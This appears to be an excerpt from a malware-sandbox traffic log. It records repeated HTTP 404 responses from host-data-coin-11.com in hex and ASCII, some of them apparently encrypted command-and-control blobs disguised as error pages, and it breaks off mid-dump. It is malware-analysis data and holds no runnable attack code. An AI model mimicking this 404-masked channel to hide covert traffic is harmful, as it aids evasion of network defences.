Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 18:09:16 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 18:09:16 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 18:09:16 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a | Data Ascii: 37I:82OR%@_M-\z.TKC0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 18:09:17 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 34 38 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 eb 98 bd a5 1d b7 51 d8 6d a5 1b 46 9b 10 bc be 71 b0 64 56 11 b1 b6 d8 40 fa 0f 85 1d 87 aa 64 9a 66 b0 f3 ce 13 6b b7 e4 4b 35 a9 f2 e0 0d 0a 30 0d 0a 0d 0a | Data Ascii: 48I:82OOjQmFqdV@dfkK50
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 18:09:21 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 18:09:21 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a | Data Ascii: 2eI:82OO~kEKg2P0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.0 (Ubuntu) | Date: Fri, 14 Jan 2022 18:07:59 GMT | Content-Type: text/html | Content-Length: 178 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 18:09:21 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 18:09:22 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 18:09:22 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a | Data Ascii: 30I:82OR&:UPJ$dP0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 18:09:24 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 18:09:24 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 18:09:25 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a | Data Ascii: 2bI:82OI<\FF2K90
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 